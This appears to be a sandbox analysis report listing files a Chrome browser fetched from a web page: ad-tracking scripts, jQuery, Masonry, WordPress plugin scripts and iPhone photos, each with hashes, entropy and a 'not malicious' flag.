                                                                                                                                                                                                                                                        SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                        SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                        SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):49
                                                                                                                                                                                                                                                        Entropy (8bit):3.176789192964165
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:CUVAae/XExlHrfx/n:8aOUJ/n
                                                                                                                                                                                                                                                        MD5:56398E76BE6355AD5999B262208A17C9
                                                                                                                                                                                                                                                        SHA1:A1FDEE122B95748D81CEE426D717C05B5174FE96
                                                                                                                                                                                                                                                        SHA-256:2F561B02A49376E3679ACD5975E3790ABDFF09ECBADFA1E1858C7BA26E3FFCEF
                                                                                                                                                                                                                                                        SHA-512:FD8B021F0236E487BFEE13BF8F0AE98760ABC492F7CA3023E292631979E135CB4CCB0C89B6234971B060AD72C0CA4474CBB5092C6C7A3255D81A54A36277B486
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://sync.crwdcntrl.net/qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y
                                                                                                                                                                                                                                                        Preview:GIF89a...................!.......,...........T..;
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3737)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3738
                                                                                                                                                                                                                                                        Entropy (8bit):5.2321193127066
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:nWPFWb8DMlLMwqaR7x/xKDyeU1Sxw1Ofk5FlqewdOGCleY+z0ci+HMCfrWH/rU/U:W4vB1/ZfSG1OMZw5Yjci+4kqcbqPTbv
                                                                                                                                                                                                                                                        MD5:91DFD4F1881C2DC5438B0F59B6141BCA
                                                                                                                                                                                                                                                        SHA1:C33C7CFCBB77E45E06D5F07DB1940998A98CFC5E
                                                                                                                                                                                                                                                        SHA-256:1225D0AB9896A0407548EB96D12406EC9392154B9DD616806D9FC29CEF06F27C
                                                                                                                                                                                                                                                        SHA-512:B519E2E96CC920CDE417CF607555CA3DEF6D89E155D98B95DA855A099282EA278CD8E801BA17533B7DED15AAAA50D40063A9ADDF70FB21889A714CE556DC1B87
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://up.pixel.ad/assets/up.js?um=1
                                                                                                                                                                                                                                                        Preview:!function(o,i){o.cntrUpTag={pixelserv:"https://pixel.sitescout.com",pixelsync:"https://pixel-sync.sitescout.com",clickserv:"https://clickserv.sitescout.com/conv/",vendorId:156,sync:function(){var r=o.cntrUpTag.pixelsync+"/dmp/asyncPixelSync",a=i.createElement("iframe");(a.frameElement||a).style.cssText="width: 0; height: 0; border: 0; display: none !important;",a.src="javascript:false",s(function(t,n){i.body.appendChild(a);var e=a.contentWindow.document,c=[];t&&c.push("gdpr_consent="+encodeURIComponent(t)),"boolean"==typeof n&&c.push("gdpr="+(n?"1":"0")),c=c.join("&"),r+=c?"?"+c:"",e.open().write("<body onload=\"window.location.href='"+r+"'\">"),e.close()})},track:function(e,t){var c=o.cntrUpTag.pixelserv+"/up/"+t;s(function(t,n){g(c+p([],e,t,n))})},conv:function(t,n,e){var c=o.cntrUpTag.clickserv,r=[];if(e&&r.push("transactionId="+e),n&&t)c=c+t+"/"+n;else{if(!t)return;c+=t}s(function(t,n){g(c+p(r,"cntrData",t,n))})},iap:function(t){var e=o.cntrUpTag.pixelserv+"/iap/"+t;s(function(t,n)
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 900 x 629, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):404921
                                                                                                                                                                                                                                                        Entropy (8bit):7.994021166242542
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:6144:xkgihz+rzGhZgbr6ER8YDuwgdYCg5r7jBjCQfeWW/9Y5y5iU/rDXGrF3NdE+/ibk:7Ayv1LqKuuN5r7tjCyW/u5y5iUfYrDSk
                                                                                                                                                                                                                                                        MD5:46C4007BAF815ECC8E2433F53C17F540
                                                                                                                                                                                                                                                        SHA1:64BC5F9EF7CCE8F758F1CDEB0BF3C06F37140C52
                                                                                                                                                                                                                                                        SHA-256:9F1BAD038C6321E0BA68BFC72DD9955CC21ACD6EC905DED7843F29B4CEC8AD98
                                                                                                                                                                                                                                                        SHA-512:4B4194EDABD5E76997E742A56002E29AD881A0321208D86995EEBBF7A475294A34D3AEE5DDF88337A2896D8078394582ACE047C2895AA44A20FE9D46D56460DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......u.......>3....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):87553
                                                                                                                                                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                                                                                                                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23966)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):24138
                                                                                                                                                                                                                                                        Entropy (8bit):5.096569708153791
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:Ar7mIr/Dh5rA3rzB4rMhr/XWGHW/6rMz1xftF2OUVP4eAnbhfreD6dCBEOav7blM:+SxxGG2/71xftFqVP4eAnI0ROavPSCzo
                                                                                                                                                                                                                                                        MD5:3B3FC826E58FC554108E4A651C9C7848
                                                                                                                                                                                                                                                        SHA1:76778FD446E2FF2377588A7B4AC4D79F258427C9
                                                                                                                                                                                                                                                        SHA-256:E00ADD38134EAC2FB8E8E9C09CBFFF7BBE57952B210322EB2EECB0A21FC055EB
                                                                                                                                                                                                                                                        SHA-512:AE192D8D804F7DAFD8B7A95220CEB66C0C308A51CDF42C172C20F71F50052E4529B01F8781C5F305E1E0D6C5367D9678F1D908EE4273DB594FBB650C56A9F61B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */./*!. * Masonry PACKAGED v4.2.2. * Cascading grid layout library. * https://masonry.desandro.com. * MIT License. * by David DeSandro. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.optio
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (2085), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2085
                                                                                                                                                                                                                                                        Entropy (8bit):5.243739436237358
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:7+ovc0Qm9qjgB+cafqM2fA7nBOCRbHDTAw0fsFrKPH:ycce9qjXsbA7nBOmbHf0fsFiH
                                                                                                                                                                                                                                                        MD5:765D1BFBB7D1DB226B087D7CCFA2AD4A
                                                                                                                                                                                                                                                        SHA1:6BA8DCE308F8069E2C378D0B8C4330384DECD8EC
                                                                                                                                                                                                                                                        SHA-256:8109773F354963AB77668F0B5D65D2B0C82F27917A994D1CC50A4EA43C00749E
                                                                                                                                                                                                                                                        SHA-512:5228DE0E86D2131AAB18A1E2798D2B39050E1BE26FC3CFF95B26CA783C28E535384BA34F3D8A2573FCBF1AD2ABF75B93C6EDAB101D4AFB4053535F3270C0AF0A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{if(window.TVE_Dash=window.TVE_Dash||{},!e||!e.$j){var a=window.$,e={$j:jQuery.noConflict()};a&&(window.$=a)}!function(a){TVE_Dash.ajax_sent=!1;var t={},s={};TVE_Dash.add_load_item=function(e,n,o){var r;if("function"!=typeof o&&(o=a.noop),TVE_Dash.ajax_sent){var i={},_={};return i[e]=n,_[e]=o,this.send_ajax(i,_),!0}return n?(t[e]&&"function"==typeof(null===(r=console)||void 0===r?void 0:r.warn)&&console.warn(e+" ajax action already defined"),t[e]=n,s[e]=o,!0):(console.error&&console.error("missing ajax data"),!1)},TVE_Dash.ajax_load_css=function(e){a.each(e,(function(e,t){a("link#"+(e+="-css")).length||a('<link rel="stylesheet" id="'+e+'" type="text/css" href="'+t+'"/>').appendTo("head")}))},TVE_Dash.ajax_load_js=function(e){var t=document.body;a.each(e,(function(s,n){if(-1!==s.indexOf("_before"))return!0;var o=document.createElement("script");e[s+"_before"]&&a('<script type="text/javascript">'+e[s+"_before"]+"<\/script>").after(t.lastChild),s&&(o.id=s+"-script"),o.src=n,t.appendC
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 768 x 723, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):572544
                                                                                                                                                                                                                                                        Entropy (8bit):7.983705584425439
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12288:EJmPe5E/G40jVH+nbtKSjF4ySVak9PLBHaE9YbrX5Qr3rzH:E8MGAh+btKOSh9ztQX58X
                                                                                                                                                                                                                                                        MD5:B004F15B12249E1DB466BEB3131E83AE
                                                                                                                                                                                                                                                        SHA1:4BF09315183A9C3C80CE39C0A44704E0B850B93B
                                                                                                                                                                                                                                                        SHA-256:00B00653330C2FD3730E221E65F987BA06BE332B981C25484DA8B56B0C0A38A3
                                                                                                                                                                                                                                                        SHA-512:AF1786F013E1628642C021B3EA0ACD79C14C867F206DC0A87719FEEDAB160319FDAAB564D7A2883869D0F03B4108E6049FA014796B72AFF033637FADA8E598F7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/uploads/2025/01/stuart-768x723.png
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............\e.....pHYs..........+.... .IDATx..y...]..y..].r.Z].*..xIb.Jb....Y.4CB....Q.....i4...P...B.V....a4b...@....N.t'q..%.....r..\....=..,...=.^..,...G:.K.s.{n...... ..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D"..B]...D"..!....J.Tq..'..D"..+'&..HdF.a/.:.:...7....x.....xF)U_..D".H$....@$r..B.n.|....Xjo=..p#p.8...t....e.D..V.D....@.x`......R.....D".H....H.2!..../ ..n.R.....=H`.3p....pk{[8O.y...x...#`.$.'.u`... ..D"..CL.".K.6.. A....8.T..nA.:./.!~.x`.x.x.x.8.~.Rjt..-..D".W.1..D..B.=$...R........#...v......#I.7.O(.V/.qE".H$r....H.".B8........@...H...E.A..i././".@..D".H$r...@$r..1.;...x..v...C.>..~x..D...~...2\l....H$..D^).j...'B..R.....x..x..'.O.....X...H$..|... .9.Z.#.m...."...W.&.i.......#..D"...N.zF"...nD...d..vd.7rn9.|...|.YJ.;...e@+.......%D.... .8....*b'\..R...G.D"..1..D^..].a.N..?..'..^-. K....Y.x..".K....bn..d....._#A.t).tw..d..%.....'.G.}#.)....D"W.1..D.....Bu.....A*Y.He+r..Hep.....Q...
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6198), with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6198
                                                                                                                                                                                                                                                        Entropy (8bit):5.206753677523754
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:MZ14qyTyyCjDBHzo/PZNsZ65Vt8yrqcdtIDxNiCx:Mr4qGSJonZN+EVt8yrqcdtIDXfx
                                                                                                                                                                                                                                                        MD5:AA35605D0E84C09643876BED5D697FDA
                                                                                                                                                                                                                                                        SHA1:BF9A600E794A756191247FBBC9F48FFB5AE24A6B
                                                                                                                                                                                                                                                        SHA-256:ACFC1F89313411D254AF6BB6B1721718FA6FAB02A266784AD743FE37ABB370A8
                                                                                                                                                                                                                                                        SHA-512:870757B43DC7A623A7CA90C6CD2157910940FC90297F483837249F04A2BBCFC65228317CD4D80BF1B7FFCE47B684AAF2E6F71C16EA2EA08B07793C1DDB47304B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js?v=10.4.2&ver=10.4.2
                                                                                                                                                                                                                                                        Preview:(()=>{var t={72484:(t,e,o)=>{((e,n)=>{const s=o(21715),a=o(44281),i={init:()=>{TCB_Front.Utils.isEditorPage()||(e(".thrv_social.thrv_social_custom").each(((t,o)=>i.initUI(e(o)))),i.initButtons(),e("body").on("click",".thrv_social_custom:not(.thrv_social_follow) .tve_s_item",(function(){const t=e(this),o=t.attr("data-s");a[o]&&a[o](t)})),e(".thrv_social_follow").each(((t,o)=>{let n=!0;e(o).find(".tve_s_item").each(((t,o)=>{const s=e(o);s.find("a").attr("href")?n=!1:s.hide()})),n&&o.style.setProperty("display","none","important")}))),s.initShareCounts()},initUI:t=>{const e=n.Utils.jsonParse(t,"data-device-config"),o=n.getDisplayType();if(e[o]){const n=e[o],s=n.button_type||"tve_social_itb",a=1===parseInt(n.isFullWidth),i=n.showCount,r=1===parseInt(n.isVertical),c=t.find(".tve_social_items").attr("class").replace(/(tve_social_items|tve_social_custom)/g,"").match(/(\s+)?tve_social_([a-z]{2,3})/),d=c?"tve_social_"+c[2]:"tve_social_itb";d!==s&&t.find(".tve_social_items").removeClass(d).addCl
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Pro, xresolution=202, yresolution=210, software=17.6.1, datetime=2025:01:01 13:06:54, hostcomputer=iPhone 15 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x511, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):80941
                                                                                                                                                                                                                                                        Entropy (8bit):7.934352257667343
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:Y3yOKHzDEfVeGz/BNy4gvCHspE2EbBqsHnaZfSqyWd+nf5H8wean3B72C1vynL:Y3BEXGzyZvC/2Mrn6fhyWdaBc30X1vyL
                                                                                                                                                                                                                                                        MD5:6274E38F2C526BD69811AE3C98A87052
                                                                                                                                                                                                                                                        SHA1:484736EDA0566C1DE9624FD936920AB5AC514753
                                                                                                                                                                                                                                                        SHA-256:5EF98984332D36858F051DE7FADBE81EE8F1E6D0C3370623D890C95FC427F2A7
                                                                                                                                                                                                                                                        SHA-512:6802923CDE45B653A3897E15BE2610B22679CC2961FCE969AC6D81D7C1FAFDDA778D8FB07E722B4F1105ED490A44AA862871DA4D4D38EA53D2D6CF6E574B980C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/dd66daa9-9433-4f14-b223-5ee977a0676b.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 15 Pro.H.......H.......17.6.1.2025:01:01 13:06:54.iPhone 15 Pro.H.......H......."."...........'.......@...........0232............................................355.........355.........0100....................................................................................................................................2...........3...........4...0...........................$...........,...........@...........T...........\...........d...........l...........t...........|...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 15 Pro back triple camera 6.765mm f/1.78.....<...L.......2025:01:01 13:06:54.2025:01:01 13:06:54.w ...0......'d...Q..............}...a.....U.9.T.Apple iOS...MM.6...............................h......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 12, xresolution=198, yresolution=206, software=17.4.1, datetime=2024:08:16 13:09:57, hostcomputer=iPhone 12, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):38589
                                                                                                                                                                                                                                                        Entropy (8bit):7.866324693133393
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:TGGs72VTKLpApV0MMezf33rHAxHr0p6BVZSliA/FwlEhoGWFZ/zig0:SGs72SqMQMxHrY6BVZ3obur+B
                                                                                                                                                                                                                                                        MD5:7D2AE00B15B543A8A72391D8BBA0E961
                                                                                                                                                                                                                                                        SHA1:20199C24F0D3CBC9618E7372B96E7CF8A4C39861
                                                                                                                                                                                                                                                        SHA-256:BFEECC76E36BADC9A69921DFCB5D5D84E69E1C67DD659DFE8DB5AE4F89DA5D83
                                                                                                                                                                                                                                                        SHA-512:08503511325A48D585895CD5D26EA6DD64551D08FE8E1A907199C871B8AEC40669270F097C4301431F8853CED48252EACB806389D6CBF7E8E31F87501877349B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 12.H.......H.......17.4.1.2024:08:16 13:09:57.iPhone 12.H.......H......."."...........'.......d...........0232............................................088.........088.........0100....................................................................................................................................2...........3...........4...,....................................... ...........4...........H...........P...........X...........`...........h...........p...|...Y...x.......-04:00.-04:00.-04:00.................................Apple.iPhone 12 back dual wide camera 4.2mm f/1.6.....<...........2024:08:16 13:09:57.2024:08:16 13:09:57......(..o8...)..e/..V.........................k.Apple iOS...MM.-.......................0.......h...0..............................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1000 x 1000, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):105963
                                                                                                                                                                                                                                                        Entropy (8bit):7.978338939051904
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:+cI9EHdWy2fFW8vj5FQYK+6Oyu8Myg9J2W:+1KWy2fF5FVLb7Z99J5
                                                                                                                                                                                                                                                        MD5:8D0A2C1E8D242051E26CFACBCFDD5AAC
                                                                                                                                                                                                                                                        SHA1:64275BAF11B2236333EABCB8CA77FCDAF10E2435
                                                                                                                                                                                                                                                        SHA-256:BE6FFBBD43380FD2BB5F1F1A38AC40941747751581762FD39C09FF0AB9AE631E
                                                                                                                                                                                                                                                        SHA-512:2A592BDD086D54C0A6A25E9B1C07F3748A5CF5406A79A13A0F90572C5B4186A8CCEF2EEC1FAF69F12AA1CC8CDED5A7E4293FA899E27E8EC192228473E52DF182
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............M.......pHYs.................IDATx...u|S.....M.........m..m..1.1w.`...17.L:a....a.[...m...H.w>.&'.y>.y..o...{.....t"..B.!..B..L...!...B.X... ..c...D.z...@8......i...g....;..m.v5P.....3V...*.:......@.?.\y....@..[.7..!....i2....B.Qc....Jj|...8.W|.......r....E{...{..8..*....})..B.?..].!D..,. .h.d..@:..<.H.Rp...........@~.....`/p.i.W.P.!.. )..B...bM.Uxg."<....6..'...W........x...u.r..B.!t$...B...8...h....9...n.xj...v`..^;.]2./...WH.....h...W...W.....M................p.r....!... ...B.%4.5.h...o.....B.0...u......._.?nt.r..._.!.p;)..B..f.......B.}..`T.M....p_...U....:m..*..!..oR..!..f.F..._..N...0....K...}...X..u.r.T..B..?.@.B.q\4.5...t..6~l.tI....l.V.+.?.r.rKT..B..@.B..4.5.W1...4~l.h*s...../.l..W9m..JS.!..zR..!....bm...z.=q-S.R.J..f....`)..i..6..B.o#...B..........^.JC.....%.....2.e.B..&...B...b...........+.%....$.g`>..i.P.I.!.'I....~...[?.W.w.L*3.!...W......|N.!....B..g4.5.W!..#.Y]....u....<`..[.4..B.]I....>N.X.....F.:.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Pro, xresolution=202, yresolution=210, software=17.6.1, datetime=2025:01:08 14:36:18, hostcomputer=iPhone 15 Pro, xresolution=259, yresolution=267, GPS-Data], baseline, precision 8, 420x705, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):104868
                                                                                                                                                                                                                                                        Entropy (8bit):7.942043914542796
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:33Bf8s/chQz1Yzjupq524bCgc3NLHOQ65hFrl0A97/nBZ:33BUuc2z+O1gc3NLCNuAt3
                                                                                                                                                                                                                                                        MD5:90CAEA003C93F848B5A83A75445E7D01
                                                                                                                                                                                                                                                        SHA1:7A0E27FD36220DB8826D3BF7542EF07C7D5630F4
                                                                                                                                                                                                                                                        SHA-256:F4182752172B1B5001429C281A46811F8821AC415210D39E52A4A8B88641F923
                                                                                                                                                                                                                                                        SHA-512:B551186F2161A638372465CC818244925DC43DB9C425CBF6694785E0F7680E09D402F1E9DEF5919AEA283917587E7943E69A3FA5206B6D48E698EC3FA4FB0593
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%.......b.......Apple.iPhone 15 Pro.H.......H.......17.6.1.2025:01:08 14:36:18.iPhone 15 Pro.H.......H......."."...........'.......P...........0232............................................249.........249.........0100....................V...............................................................................................................2...........3...........4...0...........................$...........,...........@...........T...........\...........d...........l...........t...........|...|...............-05:00.-05:00.-05:00.................L...............Apple.iPhone 15 Pro back triple camera 6.765mm f/1.78.....o...L.......2025:01:08 14:36:18.2025:01:08 14:36:18..2..I.......'d..7k...(..........}...a...!.Y...\.Apple iOS...MM.5...............................h......................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 15 Plus, xresolution=203, yresolution=211, software=18.1.1, datetime=2024:12:19 19:21:51, hostcomputer=iPhone 15 Plus, xresolution=261, yresolution=269, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):57174
                                                                                                                                                                                                                                                        Entropy (8bit):7.907314291203263
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:63cWCEGMo763Z6KM5UJ2jV4Iwen9u1tuCuLsJN0zDvxkpwTJTO:638V7763wLS2x4DOwtuCu8NMDey1y
                                                                                                                                                                                                                                                        MD5:DE259DEB1DB3431BAA12DFD8CE1DB44D
                                                                                                                                                                                                                                                        SHA1:7FB457190A7C77B877AC7D5EAE180D0FBF10DAEF
                                                                                                                                                                                                                                                        SHA-256:6C5D850453B40B0C04C7046E05DC5E3C779886AA53251B780349D42ADBD7C807
